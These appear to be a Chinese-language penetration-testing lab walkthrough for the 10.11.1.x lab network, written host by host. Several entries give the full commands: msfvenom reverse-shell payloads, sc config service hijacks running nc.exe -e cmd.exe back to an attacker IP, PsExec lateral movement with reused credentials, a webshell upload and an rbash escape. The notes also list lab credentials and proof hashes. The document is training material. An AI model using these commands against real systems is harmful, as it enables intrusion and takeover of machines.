10.11.1.5

存在漏洞 MS03-026 MS03-026

proof.txt ed20b785808f615be2c588ed925b18ce

登录帐号 alice密码aliceishere

额外发现 bank-account.zip 解压密码alice

内含文件:bank-account

10.11.1.7

需要后期发现帐号及密码

10.11.1.8

https://wp.jinzz.cc/?p=530

10.11.1.10

https://wp.jinzz.cc/?p=579

10.11.1.13/10.11.1.14

存在漏洞: FTP未合理设置上传权限,可以上传木马至网页根目录

利用msfvenom生成asp木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.222 LPORT=4444 -f asp > 1.asp

使用windwos机子将木马文件上传至目标机器.访问10.11.1.13/1.asp同时Kali在后台生成监听端口

即可得到反弹的低权限shell

得到低权限反弹shell之后使用accesschk来检查各个文件及服务有没有misconfigration

accesschk.exe /accepteula -uwcqv IWAM_BOB *

发现SSDPSRV和upnphost这两个服务存在误配置

命令行修改SSDPSRV所运行的.exe文件为我们想要运行的文件

sc config SSDPSRV binpath= “c:\inetpub\wwwroot\nc.exe -nv 10.11.0.222 9090 -e cmd.exe”
sc config SSDPSRV obj= “.\LocalSystem” password= “”
sc config SSDPSRV start= “demand”  //mmp没文章要说加这个命令,查了google上某国人文章才知道,原来的服务是被disable的!!!妈的我居然忽略了报错信息!!! 3小时—RIP
net start SSDPSRV

SYSTEM shell get√

proof.txt a26f37da4583ff68f44d133d12ae3459

参考:http://fuzzysecurity.com/tutorials/16.html

10.11.1.22

存在漏洞:Samba 2.2.x - ‘call_trans2open’ Remote Buffer Overflow

exploitDB上有漏洞利用源码,msfconsole里直接有ruby脚本

使用,拿到shell√

proof.txt da690f91f46eb888719fe942efed2993

 

10.11.1.24

存在漏洞 : web界面管理员密码与linux账户管理员密码都为弱密码

发现后台管理员面板10.11.1.24/admin 帐号密码为弱密码admin

尝试上传文件,发现有上传文件扩展名限制,不能上传.php文件

尝试上传.PHP文件,成功

用msfvenom编译php shellcode发现问题,尝试第三方webshell

使用b374k webshell  b374k

https://github.com/b374k/b374k#b374k-shell-32 编译webshell,上传,得到低权限交互界面

cat /etc/passwd

发现疑似管理员帐号patrick

按照之前获取CMS密码的经验尝试账户名为密码登录

成功登录

shell get √

proof.txt c19cf7756cfef80636d95d9e73ef4a2e

 

10.11.1.31

https://wp.jinzz.cc/?p=618

10.11.1.35

https://wp.jinzz.cc/?p=627

10.11.1.39

https://wp.jinzz.cc/?p=662

10.11.1.44

需要后期发现

 

10.11.1.49/50

nmap快速扫描结果并不准确!需要对所有端口进行扫描

发现存在9505端口。

浏览器直接访问,发现存在HFS文件分享系统。

MSF现成利用脚本 windows/http/rejetto_hfs_exec

目标机器打开了防火墙,所以记得把LPORT改成443

可以得到地权限的shell

net user 查看一下存在的用户,发现存在alice。

而alice是实验室的地一台机子且已经被我们拿下,已知那台机子alice的密码是aliceishere,可能这台机子上也是这个密码。

我们向目标机器上传PsExec.exe文件和nc.exe    link: PsExec  nc

PsExec.exe -accpeteula \\Bethany2 -ua alice -pa aliceishere C:\HFS\nc.exe -vn 10.11.0.94 443 -e cmd.exe

shell get √

proof.txt 1f1f1eb58e44d5d24e44070b3b29c0d5

 

10.11.1.71

https://forums.offensive-security.com/showthread.php?t=4689

 

10.11.1.72

mail管理系统弱密码 root root

发现ryuu账户有一份邮件包含了ssh登录密码

username: ryuu password: QUHqhUPRKXMo4m7k

break rbash:https://www.cnblogs.com/xiaoxiaoleo/p/8450379.html

hacker@beta:~$ BASH_CMDS[a]=/bin/sh;a

hacker@beta:~$ export PATH=$PATH:/bin/

hacker@beta:~$ export PATH=$PATH:/usr/bin

 

10.11.1.115

enum4linux扫描一下,发现低版本的samba 2.2.7

https://www.exploit-db.com/exploits/10/

编译运行